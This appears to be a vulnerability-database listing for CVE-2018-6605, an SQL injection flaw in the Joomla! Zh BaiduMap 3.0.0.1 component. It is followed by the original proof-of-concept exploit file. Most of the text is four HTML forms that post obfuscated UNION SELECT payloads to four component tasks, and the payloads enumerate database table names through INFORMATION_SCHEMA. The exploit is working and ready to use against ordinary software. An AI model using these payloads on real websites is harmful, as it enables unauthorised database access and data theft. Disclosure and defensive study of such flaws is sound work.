Joomla! Zh BaiduMap 3.0.0.1 SQL Injection

🗓️ 06 Feb 2018 00:00:00Reported by Ihsan SencanType

packetstorm🔗 packetstormsecurity.com👁 30 Views

Joomla! Zh BaiduMap 3.0.0.1 SQL Injection vulnerability allows attackers to inject SQL commands. The exploit can be performed through multiple functions in the component, such as getPlacemarkDetails and getPathDetails

Reporter	Title	Published	Views	Family All 13
0day.today	Joomla Zh BaiduMap 3.0.0.1 Component - SQL Injection Vulnerability	5 Feb 201800:00	–	zdt
Circl	CVE-2018-6605	7 Apr 202600:00	–	circl
CNVD	ZhaiduMap SQL Injection Vulnerability (CNVD-2018-02954)	6 Feb 201800:00	–	cnvd
CVE	CVE-2018-6605	5 Feb 201821:00	–	cve
Cvelist	CVE-2018-6605	5 Feb 201821:00	–	cvelist
Exploit DB	Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection	5 Feb 201800:00	–	exploitdb
exploitpack	Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection	5 Feb 201800:00	–	exploitpack
Joomla! Vulnerable Extensions List	Zh BaiduMap, 3.0.0.1, SQL Injection	21 Feb 201800:00	–	joomla
Nuclei	Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection	5 Jun 202603:02	–	nuclei
NVD	CVE-2018-6605	5 Feb 201821:29	–	nvd

`<!--  
# # # # #  
# Exploit Title: Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection  
# Dork: N/A  
# Date: 04.02.2018  
# Vendor Homepage: http://zhuk.cc/  
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-baidumap/  
# Software Download: http://zhuk.cc/files/pkg_zhbaidumap-j30-3.0.0.1-final.zip  
# Version: 3.0.0.1  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-6605  
# # # # #  
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Social: @ihsansencan  
# Want To Donate ?  
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ  
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2  
# # # # #  
# Description:  
# The vulnerability allows an attacker to inject sql commands....  
#   
# Proof of Concept:   
#   
# # # # #  
-->  
<html>  
<body>  
<!--com_zhbaidumap/controller.php-->  
  
<!--# 1)-->  
<!--L 27: public function getPlacemarkDetails() {........}-->  
<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails" method="post">  
<input name="id" value="-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,/*!01111CONCAT*/((/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--" type="hidden">  
<input type="submit" value="1-Ver Ayari">  
</form>  
  
<!--# 2)-->  
<!--L 356: public function getPlacemarkHoverText() {........}-->  
<form action="http://localhost/Joomla375/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkHoverText" method="post">  
<input name="id" value="-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,/*!02222CONCAT*/((/*!02222SELECT*/(@x)/*!02222FROM*/(/*!02222SELECT*/(@x:=0x00),(@NR:=0),(/*!02222SELECT*/(0)/*!02222FROM*/(INFORMATION_SCHEMA.TABLES)/*!02222WHERE*/(TABLE_SCHEMA!=0x696e226f726d6174696f6e5f736368656d61)/*!02222AND*/(0x00)IN(@x:=/*!02222CONCAT*/(@x,/*!02222LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),22,22--" type="hidden">  
<input type="submit" value="2-Ver Ayari">  
</form>  
  
<!--# 3)-->  
<!--L 411: public function getPathHoverText() {........}-->  
<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathHoverText" method="post">  
<input name="id" value="-33 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,/*!03333CONCAT*/((/*!03333SELECT*/(@x)/*!03333FROM*/(/*!03333SELECT*/(@x:=0x00),(@NR:=0),(/*!03333SELECT*/(0)/*!03333FROM*/(INFORMATION_SCHEMA.TABLES)/*!03333WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!03333AND*/(0x00)IN(@x:=/*!03333CONCAT*/(@x,/*!03333LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33--" type="hidden">  
<input type="submit" value="3-Ver Ayari">  
</form>  
  
<!--# 4)-->  
<!--L 756: public function getPathDetails() {........}-->  
<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathDetails" method="post">  
<input name="id" value="-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,/*!04444CONCAT*/((/*!04444SELECT*/(@x)/*!04444FROM*/(/*!04444SELECT*/(@x:=0x00),(@NR:=0),(/*!04444SELECT*/(0)/*!04444FROM*/(INFORMATION_SCHEMA.TABLES)/*!04444WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!04444AND*/(0x00)IN(@x:=/*!04444CONCAT*/(@x,/*!04444LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44--" type="hidden">  
<input type="submit" value="4-Ver Ayari">  
</form>  
  
</body>  
</html>  
  
`

06 Feb 2018 00:00Current

9.2High risk

Vulners AI Score9.2

EPSS0.92038